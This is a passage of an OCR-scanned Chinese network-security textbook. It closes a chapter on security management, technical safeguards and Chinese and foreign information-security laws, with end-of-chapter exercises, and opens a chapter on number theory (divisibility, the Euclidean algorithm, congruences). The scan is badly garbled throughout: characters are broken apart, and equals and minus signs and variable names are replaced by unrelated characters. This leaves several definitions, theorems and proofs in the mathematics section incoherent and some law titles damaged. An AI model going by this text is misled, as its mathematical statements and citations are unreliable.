的 民事 责任 做 出 规定 。 

(3) 网 络 利用 的 法 律 问 题 。 这 部 分 内 容 是 针对 人 们 利用 网 络 进行 网 络 以 外 的 活动 而 做 
出 法 律 规定 。 

2. 国外 安全 立法 的 现状 

发 达 国 家 较 早 开展 了 相关 计算 机 应 用 的 法 律 问题 ,制定 了 一 些 相 关 的 法 律 和 法 规 ,用 来 
规范 计算 机 在 社会 和 经 济 活动 中 的 使 用 。 美 国 不 仅 信息 技术 具有 国际 领先 水 平 ,而 且 信 息 
安全 法 律 体系 也 比较 完备 。 美 国 在 1987 年 再 次 修改 了 计算 机 犯罪 法 ,此 外 ,逐步 制定 了 计 
算 机 安全 法 、. 电 子 通信 和 隐私 法 `. 个 人 隐私 法 .电子 数据 安全 法 等 多 部 法 律 。 其 他 很 多 国家 也 
制定 了 比较 成 熟 的 信息 安全 法 律 。 

3. 我 国安 全 立法 的 现状 

目前 我 国安 全 立法 的 主要 特点 : 

(1) 信息 安全 法 律 法 规 体系 初步 形成 。 

(2) 与 信息 安全 相关 的 司法 和 行政 管理 体系 迅速 完善 。 

(3) 目前 法 律 规定 中 法 律 少 而 规章 等 偏 多 ,缺乏 信息 安全 的 基本 法 。 

(4) 相关 法 律 规定 篇 幅 偏 小 ,行为 规范 较 简 单 。 

(5) 与 信息 安全 相关 的 其 他 法 律 有 待 完 善 。 


1.3.2 安全 管理 


解决 网 络 安全 问题 ,应 该 加 强 网 络 安 全 的 管理 工作 , 正 是 所 谓 的 “三 分 技术 ,七 分 管理 ”。 
网 络 安全 管理 包括 安全 规划 、 风 险 管 理应 急 计划 .教育 培训 、 系 统 评估 等 各 个 方面 的 内 容 。 

安全 管理 分 为 如 下 3 类 。 

1. 技术 安全 管理 

技术 安全 管理 包括 多 级 安全 用 户 鉴别 技术 的 管理 ,多 级 安全 加 密 技 术 的 管理 , 密 钥 管 理 
技术 的 管理 等 。 

2. 行政 安全 管理 

行政 安全 管理 包括 组 织 建 设 .制度 建设 和 人 员 意 识 的 管理 , 即 进行 有 关 安 全 管理 机 构 的 
建设 ; 组 织 内 部 应 该 建立 相应 的 安全 管理 规章 制度 ; 强化 人 员 的 安全 意识 。 

3. 应 急 安全 管理 

应 急 安 全 管理 包括 应 急 的 措施 阻止 .和 人 侵 的 自卫 与 反击 等 。 


1.3.3 安全 技术 措施 


安全 技术 措施 是 计算 机 网 络 安全 的 重要 保证 ,是 整个 系统 安全 的 物质 技术 基础 。 安 全 
技术 的 实施 应 贯彻 落实 在 安全 系统 生命 周期 的 各 个 阶段 ,从 系统 规划 、 系 统 分 析 、 系 统 设计 
到 系统 实施 和 管理 维护 。 

计算 机 网 络 安全 技术 涉及 的 内 容 很 多 ,不 仅 涉及 计算 机 和 外 部 、 外 围 设备 ,通信 和 和 网络 
系统 实体 ,还 涉及 数据 安全 、 软 件 安 全 、 网 络 安全 数据库 安全 运行 安全 、 防 病毒 技术 、 站 点 
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的 安全 以 及 系统 结构 .工艺 和 保密 、 压 缩 技术 。 

网 络 安全 的 技术 措施 归纳 起 来 有 以 下 4 种 。 

1. 实体 安全 技术 

指 对 网 络 与 信息 系统 物理 装备 的 保护 。 实 体 安 全 的 内 容 包 括 环境 安全 建筑 安全 、 网 络 
与 设备 安全 几 个 方面 。 主 要 涉及 的 技术 有 : 

(1) 加 扰 处 理 、 电 磁 屏 蔽 一 一 防范 电磁 泄露 。 

(2) 容错 、 容 灾 、 宛 余 备 份 .生存 性 技术 一 一 防范 随机 性 故障 。 

(3) 信息 验证 一 一 防范 信号 插入 。 

2. 运行 安全 技术 

指 对 网 络 与 信息 系统 的 运行 过 程 和 运行 状态 的 保护 。 和 运行 安全 技术 包括 访问 控制 、 审 
计 跟 踪 、 入 侵 检测 与 系统 恢复 等 几 个 方面 。 主 要 涉及 的 技术 有 : 

(1) 风险 评估 体系 、 安 全 测评 体系 一 一 支持 系统 评估 。 

(2) 漏洞 扫描 、 安 全 协议 一 一 支持 对 安全 策略 的 评估 与 保障 。 

(3) 防火 墙 、 物 理 隔 离 系 统 、 访 问 控制 技术 、 防 恶意 代码 技术 一 一 支持 访问 控制 。 

(4) 和 人 侵 检测 及 预警 系统 、 安 全 审计 技术 一 一 支持 入 侵 检测 。 

(5) 反 制 系统 、 容 侵 技术 、 审 计 与 追踪 技术 、 取 证 技术 ,动态 隔离 技术 。 

(6) 网 络 攻击 技术 ,Phishing、Botnet\DDoS 木马 等 技术 。 

3. 数据 安全 技术 

指 对 信息 在 数据 收集 ,处理 ,存储 ,检索 \ 传 输 、 交 换 \、 显 示 、 扩 散 等 过 程 中 的 保护 ,使 得 在 
数据 处 理 层面 保障 信息 依据 授权 使 用 ,不 被 非法 冒充 、 窃 取 、 自 改 、 抵 赖 。 数 据 安全 技术 包括 
数据 加 密 数据 存储 安全 数据 备份 等 几 个 方面 。 主 要 涉及 的 技术 有 : 

(1) 对 称 与 非 对 称 密码 技术 及 其 硬化 技术 、VPN 等 技术 一 一 防范 信息 泄密 。 

(2) 认证 ,鉴别 .PKI 等 技术 一 一 防范 信息 伪造 。 

(3) 完整 性 验证 技术 一 一 防范 信息 算 改 。 

(4) 数字 签名 技术 一 一 防范 信息 抵赖 。 

(5) 秘密 共享 技术 一 一 防范 信息 破坏 。 

4. 内 容 安全 技术 

指 对 信息 在 网 络 内 流动 中 的 选择 性 阻 断 , 以 保证 信息 流动 的 可 控 能 力 。 主 要 涉及 的 技 
术 有 : 

(1) 文本 识别 .图 像 识 别 \ 流 媒体 识别 、 群 发 邮件 识别 等 一 一 用 于 对 信息 的 理解 与 分 析 。 

(2) 面向 内 容 的 过 滤 技 术 (CVP) \ 面 向 URL 的 过 滤 技 术 (UFP) \ 面 向 DNS 的 过 滤 技术 
等 一 一 用 于 对 信息 的 过 滤 。 


1.4 计算 机 网 络 安全 的 法 律 和 法 规 


1.4.1 国外 的 相关 法 律 和 法 规 


国外 发 达 国 家 加 强 信息 安全 立法 ,实现 统一 和 规范 管理 。 美 . 俄 .日 等 国家 在 2000 年 制 
定 了 相关 法 律 和 法 规 , 主 要 有 美国 的 (电子 签名 法 案 ) 正 式 生效 ,并 通过 了 《互联 网 网 络 完 备 


性 及 关键 设备 保护 法 案 》, 俄 罗斯 批准 了 《国家 信息 安全 构想 》, 日 本 公布 了 《信息 网 络 安全 可 
靠 性 基准 ) 的 补充 修改 方案 。 

国外 相关 法 律 和 法 规 主要 有 美国 的 《信息 自由 法 》《 反 腐败 行为 法 》《 伪 造访 问 设备 和 
计算 机 欺骗 与 滥用 法 》《 计 算 机 安全 法 》OMB A-130 规章 之 附录 三 :《 联 邦 自动 化 信息 系 
统 的 安全 》NIST 特别 报告 书 800-34:《 信 息 技术 系统 应 急 计 划 指 南 )《 个 人 隐私 法 》。 部 分 
国家 对 数据 保护 的 立法 情况 见 表 1. 1。 


表 1.1 部 分 国家 数据 保护 立法 情况 


国 ”家 立 法 制定 日 期 生效 日 期 
数据 保护 法 1980-01-01 1982-10-18 
关于 个 人 数据 处 理 的 隐私 保护 法 1992-12-08 1993-04-01 
私人 注册 法 1979-01-01 1982-06-08 
数据 保护 法 1987-02-04 1988-01-01 
数据 处 理 、 数 据 文件 和 私人 自由 法 1980-01-01 1982-01-06 
数据 保护 法 1977-01-27 1979-01-01 
个 人 数据 记录 草案 1981-06-05 1982-01-01 
数据 保护 法 1988-07-13 1989-04-19 
计算 机 处 理 中 连接 数据 名 称 的 使 用 法 1979-03-31 1979-10-01 
午 兰 数据 保护 法 1988-07-13 1990-07-01 
挪威 个 人 数据 注册 法 1980-01-01 1982-06-09 
葡萄 牙 个 人 数据 保护 法 1991-04-29 1991-05-04 
西班牙 个 人 数据 自动 处 理 规则 法 1992-10-29 1993-02-01 
瑞典 数据 法 1973-05-13 1974-07-01 
瑞士 数据 保护 法 1992-06-19 1993-07-01 
英国 数据 保护 法 1984-07-12 1987-11-01 


1.4.2 我 国 的 相关 法 律 和 法 规 


我 国 从 1994 年 起 制定 发 布 了 《中 华人 民 共和 国 计 算 机 信息 系统 安全 保护 条 例 ) 等 一 系 
列 计算 机 网 络 安全 方面 的 法 规 。 这 些 法 规 主要 涉及 5 个 方面 : 计算 机 网 络 安全 及 信息 系统 
安全 保护 、 国 际 联网 管理 .商用 密码 管理 .计算 机 病毒 防治 和 安全 产品 检测 与 销售 。 

1. 计算 机 网 络 安全 及 信息 系统 安全 保护 

1991 年 ,国务 院 第 83 次 常委 会 议 通过 (中 华人 民 共 和 国 计 算 机 软件 保护 条 例 》。 

作为 我 国 第 一 个 关于 信息 系统 安全 方面 的 法 规 《 中 华人 民 共 和 国 计 算 机 信息 系统 安全 
保护 条 例 》 是 国务 院 于 1994 年 2 月 18 日 发 布 的 ,分 5 章 共 31 条 ,目的 是 保护 信息 系统 的 安 
全 ,促进 计算 机 的 应 用 和 发 展 。 

1988 年 9 月 5 日 第 七 届 全 国人 民 代表 大 会 常务 委员 会 第 三 次 会 议 通过 的 (中 华人 民 共 
和 国保 守 国家 秘密 法 ), 第 三 章 第 十 七 条 提出 “采用 电子 信息 等 技术 存 取 、 处 理 \ 传 递 国家 秘 
密 的 办 法 ,由 国家 保密 部 门 会 同 中 央 有 关机 关 规 定 ” 和 “属于 国家 秘密 的 设备 或 者 产品 的 研 
制 、 生 产 、 运 输 , 使 用 维修 和 销毁 由 国家 保密 工作 部 门 会 同 中 央 有 关机 关 制 定 保密 办 法 ”, 明 
确 规定 了 “在 有 线 、 无 线 通 信 中 传递 国家 秘密 的 ,必须 采取 保密 措施 ”。 

1997 年 10 月 ,我 国 第 一 次 在 修订 刑法 时 增加 了 计算 机 犯罪 的 罪名 ; 为 规范 互联 网 用 户 
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的 行为 ,2000 年 12 月 28 日 九 届 全 国人 大 常委 会 通过 了 《全 国人 大 常委 会 关于 维护 互联 网 
安全 的 决定 》。 

中 华人 民 共和 国 国 家 军用 标准 (GJB 1281 一 91) :《 指 挥 自动 化 计算 机 网 络 安全 要 求 》。 

中 华人 民 共 和 国 国 家 军用 标准 (GJB 1295 一 91) :《 军 队 通 用 计算 机 系统 使 用 安全 要 求 》。 

银发 [2002]260 号 :《 中 国人 民 银 行 关于 加 强 银行 数据 集中 安全 工作 的 指导 意见 》 
(2002-9-10) 。 

银发 [2002]102 号 :《 中 国人 民 银 行 关于 落实 “网 上 银行 业务 管理 暂行 办 法 ”有 关 规 定 
的 通知 》(2002-4-23)。 

中 国人 民 银 行 令 [2001] 第 6 号 :《 网 上 银行 业务 管理 暂行 办 法 》(2001.07.09) 。 

证 监 信息 字 [1999]18 号 :《* 证 券 经 营 机 构 营 业 部 信息 系统 技术 管理 规范 (试行 )? 技 术 
指引 》(1999. 11. 03) 。 

证 监 信息 字 [1998]2 号 :《 中 国 证 券 经 营 机 构 营 业 部 信息 系统 技术 管理 规范 (试行 )》。 

2. 国际 联网 管理 

(1)《 中 华人 民 共 和 国 计 算 机 信息 网 络 国 际 联网 管理 暂行 规定 》, 是 国务 院 于 1996 年 2 
月 1 日 发 布 的 ,并 根据 1997 年 5 月 20 日 (国务 院 关于 修改 < 中 华人 民 共 和 国 计 算 机 信息 网 
络 国际 联网 管理 暂行 规定 > 的 决定 ?进行 了 修正 , 共 17 条 。 其 主要 内 容 如 下 : 

Q@ 国务 院 信 息 化 工作 领导 小 组 负责 协调 、 解 决 有 关 国 际 联网 工作 中 的 重大 问题 。 

@ Internet 必须 使 用 邮电 部 国家 公用 电信 网 提供 的 国际 出 入口 信道 。 

@ 接 人 网 络 必 须 通 过 Internet 进行 国际 联网 。 

@ 用 户 的 计算 机 或 者 计算 机 信息 网 络 必须 通过 接 人 网 络 进行 国际 联网 。 

@ 已 经 建立 的 4 个 Internet, 分 别 由 原 邮 电 部 、 原 电子 工业 部 、 国 家 教委 和 中 科 院 管理 ; 
新 建 Internet ,必须 报 经 国务 院 批准 。 

@ 拟 从 事 国际 联网 经 营 活动 或 非 经 营 活动 的 接 入 单位 应 具备 下 述 条 件 并 报批 

@ 国际 出 入 口 信道 提供 单位 互联 单位 和 接 入 单位 应 建立 相应 的 网 管 中 心 。 

(2)《 中 华人 民 共 和 国 计 算 机 信息 网 络 国际 联网 管理 暂行 规定 实施 办 法 ,是 国务 院 信 
息 化 工作 领导 小 组 于 1997 年 12 月 8 日 发 布 的 , 共 25 条 。 它 是 根据 (中 华人 民 共 和 国 计 算 
机 信息 网 络 国际 联网 管理 暂行 规定 》 而 制定 的 具体 实施 办 法 。 其 主要 内 容 如 下 : 

Q@ 国务 院 信 息 化 工作 领导 小 组 办 公 室 负责 组 织 、 协 调和 检查 监督 国际 联网 的 有 关 
工作 。 

@ 国际 联网 采用 国家 统一 制定 的 技术 标准 、 安 全 标准 和 资费 政策 。 

@ 国际 联网 实行 分 级 管理 , 即 : 对 互联 单位 、 接 人 单位 ,用户 实行 逐 级 管理 ; 对 国际 出 
入 口 信道 统一 管理 。 

@ 对 经 营 性 接 入 单位 实行 经 营 许 可 证 制度 。 经 营 许 可 证 的 格式 由 国务 院 信息 化 工作 
领导 小 组 统一 制定 ,经 营 许可 证 由 经 营 性 互联 单位 主管 部 门 颁发 ,报国 务 院 信 息 化 工作 领导 
小 组 办 公 室 备案 。 

@ 中 国 Internet 信息 中 心 提供 Internet 地 址 、 域 名 、 网 络 资源 目录 管理 和 有 关 的 信息 
服务 。 

@ 国际 出 入 口 信道 提供 单位 提供 国际 出 入 口 信道 并 收取 信道 使 用 费 。 

@ 国际 出 入口 信道 提供 单位 .互联 单位 和 接 人 单位 应 保存 与 其 服务 相关 的 所 有 资料 ， 


配合 主管 部 门 进行 的 检查 。 

互联 单位 、 接 入 单位 和 用 户 应 当 遵守 国家 有 关 法 律 , 行 政法 规 ,严格 执行 国家 安全 保 
密 制 度 。 

(3)《 中 华人 民 共 和 国 计 算 机 信息 网 络 国际 联网 安全 保护 管理 办 法 》, 是 1997 年 12 月 
11 日 经 国务 院 批准 .公安 部 于 1997 年 12 月 30 日 发 布 的 ,分 5 章 共 25 条 ,目的 是 加 强国 际 
联网 的 安全 保护 。 其 主要 内 容 如 下 : 

Q@ 公安 部 计算 机 管理 监察 机 构 及 各 级 公安 机 关 相 应 机 构 应 负责 国际 联网 的 安全 保护 
管理 工作 ,具体 是 : 保护 国际 联网 的 公共 安全 ; 管理 网 上 行为 及 传播 信息 ; 防止 出 现 利用 国 
际 联网 危害 国家 安全 等 违法 犯罪 活动 。 

@ 国际 出 入 口 信道 提供 单位 .互联 单位 的 主管 部 门 负责 国际 出 人口 信道 ,所属 Internet 
络 的 安全 保护 管理 工作 。 

@ 互联 单位 、 接 入 单位 及 使 用 国际 联网 的 法 人 应 办 理 备案 手续 并 履行 安全 保护 职责 。 

@ 从 事 国际 联网 业务 的 单位 和 个 人 应 当 接 受 公安 机 关 的 安全 监督 .检查 和 指导 ,并 协 
助 查处 网 上 违法 犯罪 行为 。 

@@ 对 电子 公告 (Bulletin Board System,BBS) 建 立 计算 机 信息 网 络 电子 公告 系统 的 用 
户 登 记 和 信息 管理 制度 。 

(4)《 中 华人 民 共 和 国 公 用 计算 机 Internet 国际 联网 管理 办 法 》, 是 原 邮 电 部 在 1996 年 
发 布 的 , 共 17 条 ,目的 是 加 强 对 中 国 公用 计算 机 Internet 国际 联网 的 管理 。 

(5) 1996 年 , 原 邮电 部 发 布 了 《计算 机 信息 网 络 国际 联网 出 入 口 信道 管理 办 法 》, 共 11 
条 ,目的 是 加 强 计 算 机 信息 网 络 国 际 联网 出 入 口 的 管理 。 

(6) 1997 年 ,国务 院 信息 化 工作 领导 小 组 发 布 了 《中 华人 民 共 和 国 互联 网 络 域名 注册 
暂行 管理 办 法 》 和 《中 华人 民 共 和 国 互 联网 络 域名 注册 实施 细则 》。 

(7)《 中 华人 民 共 和 国 互联 网 信息 服务 管理 办 法 》 于 2000 年 9 月 20 日 公布 施行 。 它 把 
互联 网 信息 服务 分 为 经 营 性 和 非 经 营 性 两 类 。 国 家 对 经 营 性 互联 网 信息 服务 实行 许可 制 
度 ; 对 非 经 营 性 互联 网 信息 服务 实行 备案 制度 。 

从 事 新 闻 .出 版 ,教育 .医疗 保健 药品 和 医疗 器 械 等 互联 网 信息 服务 ,依照 法 律 .行政 法 
规 以 及 国家 有 关 规 定 须 经 有 关 主 管 部 门 审核 同意 的 ,在 申请 经 营 许 可 或 者 履行 备案 手续 前 ， 
应 当 依 法 经 有 关 主 管 部 门 审核 同意 。 

对 从 事 经 营 性 互联 网 信息 服务 应 具备 的 条 件 、 办 理 备案 时 应 当 提 交 的 材料 ,不 得 提供 的 
信息 等 方面 进行 了 详细 的 规定 。 

(8) 国家 保密 局 发 布 的 4 中 华人 民 共 和 国 计 算 机 信息 系统 国际 联网 保密 管理 规定 》 于 
2000 年 1 月 1 日 开始 执行 ,分 4 张 共 20 条 ,目的 是 加 强国 际 联网 的 保密 管理 ,确保 国家 秘 
密 的 安全 。 

(9) 2000 年 11 月 信息 产业 部 发 布 了 (中 华人 民 共 和 国 互联 网 电子 公告 服务 管理 规定 》。 

3. 商用 密码 管理 

(1)《 中 华人 民 共 和 国 商用 密码 管理 条 例 ) 是 国务 院 在 1999 年 10 月 7 日 发 布 的 ,分 7 
章 共 27 条 ,目的 是 加 强 商用 密码 管理 ,保护 信息 安全 ,保护 公民 和 组 织 的 合法 权益 ,维护 国 
家 的 安全 和 利益 。 其 主要 内 容 如 下 : 

Q@ 国家 密码 管理 委员 会 及 其 办 公 室 (简称 密码 管理 机 构 ) 主 管 全 国 的 商用 密码 管理 
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基于 案例 的 网 络 安 会 其 术 与 实践 


下 必 。 

@ 商用 密码 技术 属于 国家 秘密 ,国家 对 商用 密码 产品 的 科研 生产、 销售 和 使 用 实行 专 
控 管 理 。 

@ 商用 密码 的 科研 任务 由 密码 管理 机 构 指 定 的 单位 承担 。 

@ 商用 密码 产品 由 密码 管理 机 构 指 定 的 单位 生产 ,其 品种 和 型 号 必须 经 国家 密码 管理 
机 构 批准 , 且 必 须 经 产品 质量 检测 机 构 检 测 合格 。 

@ 商用 密码 产品 由 密码 管理 机 构 许可 的 单位 销售 。 

@ 用 户 只 能 使 用 经 密码 管理 机 构 认 可 的 商用 密码 产品 , 且 不 得 转让 。 

(2) 2004 年 8 月 28 日 全 国人 大 常委 会 第 十 一 次 会 议 通过 了 《中 华人 民 共 和 国电 子 签 名 
法 》, 这 是 我 国 推进 电子 商务 发 展 , 扫 除 电子 商务 发 展 障碍 的 重要 步骤 。 

《中 华人 民 共 和 国电 子 签名 法 》 主 要 解决 数据 电文 和 电子 签名 的 法 律 效力 。 法 律 规定 ， 
民事 活动 中 的 合同 或 者 其 他 文件 . 单 证 等 文书 ,当事人 可 以 约定 使 用 或 者 不 使 用 电子 签名 、 
数据 电文 。 当 事 人 约定 使 用 电子 签名 数据 电文 的 文书 ,不 得 仅 因为 其 采用 电子 签名 、 数 据 
电文 的 形式 而 否定 其 法 律 效力 。 

《中 华人 民 共 和 国电 子 签 名 法 ) 重 点 解决 5 个 方面 的 问题 : 确立 了 电子 签名 的 法 律 效 
力 ; 规范 了 电子 签名 行为 ; 明确 了 认证 机 构 的 法 律 地 位 及 认证 程序 ; 规定 了 电子 签名 的 安 
全 保障 措施 ; 明确 了 电子 认证 服务 行政 许可 的 实施 机 关 。 

4. 计算 机 病毒 防治 

1989 年 ,公安 部 就 发 布 了 《计算 机 病毒 控制 规定 (草案 )》。2000 年 4 月 26 日 ,公安 部 又 
发 布 了 《计算 机 病毒 防治 管理 办 法 》, 共 22 条 ,目的 是 加 强 对 计算 机 病毒 的 预防 和 治理 ,保护 
计算 机 信息 系统 安全 。 其 主要 内 容 如 下 : 

Q@ 公安 部 公共 信息 网 络 安全 监察 部 门 主管 全 国 的 计算 机 病毒 防治 管理 工作 ,地 方 各 级 
公安 机 关 具 体 负责 本 行政 区 域内 的 计算 机 病毒 防治 管理 工作 。 

@ 任何 单位 和 个 人 应 接受 公安 机 关 对 计算 机 病毒 防治 工作 的 监督 .检查 和 指导 ,不 得 
制作 ,传播 计算 机 病毒 。 

@ 计算 机 病毒 防治 产品 厂商 ,应 及 时 向 计算 机 病毒 防治 产品 检测 机 构 提 交 病 毒 样本 。 

@ 拥有 计算 机 信息 系统 的 单位 应 建立 病毒 防治 管理 制度 并 采取 防治 措施 。 

病毒 防治 产品 应 具有 计算 机 信息 系统 安全 专用 产品 销售 许可 证 ,并 贴 有 “销售 许可 ” 
标记 。 

5. 安全 产品 检测 与 销售 

《计算 机 信息 系统 安全 专用 产品 检测 和 销售 许可 证 管理 办 法 ) 是 公安 部 于 1997 年 12 月 
12 日 发 布 并 执行 的 ,分 6 章 共 19 条 ,目的 是 加 强 计算 机 信息 系统 安全 专用 产品 的 管理 , 保 
证 安全 专用 产品 的 安全 功能 ,维护 计算 机 信息 系统 的 安全 。 其 主要 内 容 如 下 : 

QO 我 国境 内 的 安全 专用 产品 进入 市 场 销售 ,实行 销售 许可 证 制度 。 

@ 颁发 销售 许可 证 前 ,产品 必须 进行 安全 功能 的 检测 和 认定 。 一 个 典型 的 检测 过 程 
为 : 生产 商 向 检测 机 构 申请 安全 功能 检测 ; 检测 机 构 检 测 样 品 是 否 具有 信息 系统 安全 保护 
功能 ; 检测 机 构 完成 检测 后 ,将 检测 报告 报 送 公安 部 计算 机 管理 监察 部 门 备案 ; 生产 商 申 
领 销售 许可 证 。 

@ 公安 部 计算 机 管理 监察 部 门 负责 销售 许可 证 的 审批 颁发 .检测 机 构 的 审批 ,定期 发 


布 安全 专用 产品 的 检测 通告 和 经 安全 功能 检测 确认 的 安全 专用 产品 目录 。 
@ 销售 许可 证 只 对 所 申请 销售 的 安全 专用 产品 有 效 , 有 效 期 为 两 年 。 


1.5 小 结 


本 章 是 计算 机 网 络 安全 的 概述 ,主要 介绍 了 计算 机 网 络 安全 的 概念 ,网络 面临 的 主要 威 
胁 、 计 算 机 网 络 安 全 的 3 个 层次 和 计算 机 网 络 安全 的 法 律 和 法 规 。 
读者 要 掌握 基本 概念 ,对 网 络 安全 有 个 总 体 认识 ,是 后 面 章 节 的 系统 概述 。 


1.6 习 题 


.讨论 计算 机 网 络 安全 的 狭义 定义 和 广义 定义 。 
. 网络 系统 面临 的 主要 威胁 有 哪些 ? 

.主动 攻击 和 被 动 攻击 的 区 别 是 什么 ? 

4. 解释 以 下 名 词 : 

(1) 拒绝 服务 。 

(2) 恶意 程序 。 

5. 说 明 攻 击 技术 的 一 般 流程 。 
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第 2 章 数学 基础 


天 下 难事 必 作 于 易 , 天 下 大 事 必 作 于 细 。 是 以 圣人 终 不 为 大 , 故 能 成 其 大 。 
一 老子 


人 们 通常 要 使 用 代数 数论 组合 数 学 等 技术 手段 构造 计算 难题 ,而 使 用 信息 
论 和 计算 复杂 性 理论 把 这 种 “难题 ”的 难度 说 清楚 。 
-一 徐 茂 知 


网 络 安全 是 以 数学 .通信 和 计算 机 科学 等 学 科 为 基础 的 一 门 交叉 学 科 。 它 涉及 多 个 数 
学 领域 的 知识 ,主要 有 数论 .抽象 代数 .组合 数学 .数理 逻辑 ,椭圆 曲线 、 概 率 论 以 及 计算 复杂 
性 理论 等 。 本 童 介绍 涉及 数学 的 基本 知识 和 相关 理论 ,给 出 基本 定义 、 设 计 方法 和 证 明 
结论 。 


2.1 数论 基础 


2.1.1 整除 及 辑 转 相 除 


定义 2.1 设 awb 是 任意 整数 ,如 果 存 在 整数 c, 使 有 a 二 bc, 则 称 a 是 2 的 倍数 ,2 是 a 
的 因数 ; 亦 说 a 被 5 整除 ,或 5 整除 a; 记 为 bla。 

显然 ,任意 整数 整除 0, 特 别 010,1( 或 一 1) 整 除 任意 整数 。 

如 果 6 不 能 整除 a ,那么 称 之 为 带 余 除法 。 

定理 2.1 设 a.b 是 任意 整数 且 45 取 0, 则 唯一 存在 整数 g 和 ,使 得 0<r 过 4b| ,a 二 gb 十 
r。 若 "全 0, 则 称 g 为 带 余 除 法 的 不 完全 商 , 称 7 为 5 除 a 的 余数 。 

两 个 正 整 数 的 最 大 公约 数 的 思 转 相 除法 : 设 a、b 是 正 整数 , 且 之 2。 为 求 wb 的 最 大 
公约 数 , 首 先 以 56 除 a, 得 : a 二 qi5 十 ri, 式 中 gl 和 x 为 非 负 整 数 ,0 三 二 5。 车 志 二 0, 则 
a 二 qib,a 和 2 的 最 大 公约 数 (a 6) 二 6b; 若 六 天 0, 则 0 一 疡 < 以 疡 除 5, 得 : 5 二 qzri 十 rz, 式 
中 gs 和 为 非 负 整 数 ,0 志 rs 二 i。 车 7 二 0, 则 5 二 gs ni.b 和 i 的 最 大 公约 数 (6, 1) 二 nn; 
车 rr; 关 0, 则 0 二 rs 过 ni ,以 rs 除 ri 且 得 ; ni 二 qsrz 十 rs, 式 中 gs 和 x 为 非 负 整数 ,0 过 rs 二 ri. 
车 7 二 0, 则 (ri ,72) 二 r2。 从 式 a 二 qb 十 ri1 ,6 二 gon 十 rs 入 二 qsrs 十 rs 及 “ 若 整 数 d 可 整 
除 3 个 等 式 每 个 等 式 中 的 某 两 项 , 则 必 可 整除 其 第 三 项 ” 知 (a.6) 二 (5b, 71) 二 (mi, ro)。 若 
0 二 rs 过 rz, 则 再 以 rs 除 r; ,并 继续 上 述 讨 论 ,……, 一 直 轧 转 相 除 下 去 。 由 于 6 这 ni 记 r: 
rs 记 … 和 所 有 ri(i 二 1,2,3,…) 都 是 非 负 整 数 , 所 以 必 存 在 正 整 数 mn。 使 得 经 过 nn 十 1 次 轧 转 


相 除 后 有 ”+ 一 0, 而 普 关 0。 于 是 (a,0) 王 (站 ) 一 (mm) 一 … 一 (rm) 一 一 。 显 然 , 由 
定理 2.1, 运 用 轧 转 相 除 法 可 求 任意 两 个 整数 的 最 大 公约 数 。 

例 2.1 求 6731 和 2809 的 最 大 公约 数 。 

解 : 由 6731 一 2X 2809 十 1113,2809 一 2X1113 十 583,1113 一 1X583 十 530,583 一 1 X 
530 十 53,530 一 10X53 十 0 知 (6731,.2809) 一 53。 

定理 2.2 整数 a,b 的 最 大 公约 数 d = (oa, 0 可 以 表示 为 wb 的 倍数 和 , 即 存在 整数 
使 得 d= 二 sa 十 tb 成 立 。 


2.1.2 算术 基本 定理 


定义 2.2 称 正 整 数 为 质数 (或 素数 ), 如 果 n 关 1 且 n 无 1 与 自身 之 外 的 其 他 正 因 
数 ; 非 1 和 非 质数 的 正 整 数 称 合 数 。 

若 整 数 a.b 除 土 1 外 再 无 其 他 公 因 数 , 则 称 a、b 互 质 。 显 然 , 质 数 p 与 整数 a 互 质 当 且 
仅 当 zp 不 能 整除 a。 由 定义 , 正 整数 a 是 合 数 当 且 仅 当 a 具有 大 于 1 且 小 于 自身 的 正 因 数 。 

引 理 2.1 设 ai,as，…,a, 均 为 非 1 整数 且 质 数 p 整除 其 乘积 a1as…a,, 则 p 整除 a1， 
da 

定理 2.3 (算术 基本 定理 ) 若 不 计 质 因数 的 次 序 , 则 惟有 一 种 方法 将 大 于 1 的 整数 
分 解 成 其 质 因数 的 连 乘积 ( 亦 称 n 的 素 分 解 )。 

定义 2.3 设 awb 是 整数 ,m 是 正 整 数 ,车 m 分 别 整除 a、b 时 有 相同 的 余数 x, 则 称 a 与 
b 模 m 同 余 , 记 为 a 三 b(mod m)。 

显然 ,a 三 5 (mod m) 当 且 仅 当 m| (a 一 5b)。 

定理 2.4 设 a.b 是 整数 ,m 是 正 整 数 , 则 4 三 b5(mod m) 当 且 仅 当 存 在 整数 k&, 则 有 
a=b+km, 

证 明 : 设 a 三 b(mod m), 则 存在 整数 g, 和 g; ,并 成 立 a 二 gm 十 r,6 二 qom 十 r, 于 是 a 一 
0 一 (qi 一 qa)m 二 km, 则 有 a 二 6 十 km; 反 过 来 ,车 有 a 二 5 十 km, 则 a 一 6 二 km, 因 而 m| (a 一 
0) ,所 以 a 三 b(mod m)。 因 为 如 果 ml (a 一 ) 但 a 与 5 却 并 不 同 余 , 则 可 记 a 二 qim 十 ni ,0 三 
Nn<m,b6= qm 十 re,0 志 rs 二 m 且 ri 关 rz, 于 是 a 一 6 二 (qi 一 qe)m 十 (ni 一 rz),0<= 
In 一 rz| 达 | m |。 等 式 中 的 a 一 5 和 (gi 一 qs)m 可 被 m 整除 ,而 ri 一 rs 却 不 是 m 的 倍数 ， 
所 以 mr 不 能 整除 a 一 5。 这 与 ml (a 一 5) 蔬 盾 , 故 当 ml (a 一 人) 时 ,a 三 b(mod m)。 

例 2.2 判断 172 与 52 是 否 模 6 同 余 。 

解 : 由 于 172 一 52 十 20X6, 所 以 172 与 52 模 6 同 余 。 

定理 2.5 设 ab.cwd 是 整数 ,m 是 正 整数 。 车 a 三 b(mod m) 且 c 寺 d(mod m), 则 (a 十 
(Td) (mod m) ,acbd (mod m)., 

证 明 : 设 4 寺 b(mod m) 且 c 寺 d(mod m) ,由 定理 2. 4 知 存 在 和 ks 使 4 二 b 十 kim,c 二 
d 十 kom 成 立 。 因 而 有 a 十 c= 二 (6 十 d) 十 (有 十 ko)msac 二 bd 十 (bks 十 dki 十 kiks)m, 即 有 (a 十 
(L+Hd) (mod m) ,ac=bd (mod m), 

模 运算 的 基本 定理 : 

(ai op as) mod 2 一 [Ca mod n)] op (as mod n)] mod n(op 表示 泛 指 一 种 操作 符 ) 

@ 反 身 性 : a==a mod n。 

@ 对 称 性 : 若 ae 一 mod n, 则 6 二 a mod n。 
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@ 传递 性 : 车 a=b mod n 上 且 0 一 c mod nn,; 则 a 二 c mod n。 
由 如 果 a=b modn 且 c==d mod nn; 则 : 

a+tc= (b+d) mod n; 

a—c=(b—d) mod n; 

a* c=(b* d) mod 7。 

© (a+b) mod n=(a mod nt+b mod n) mod n; 


(a—b) mod n=(a modn— b modn) modn; 


(a*b) modn=(a modn* b modn) modn, 
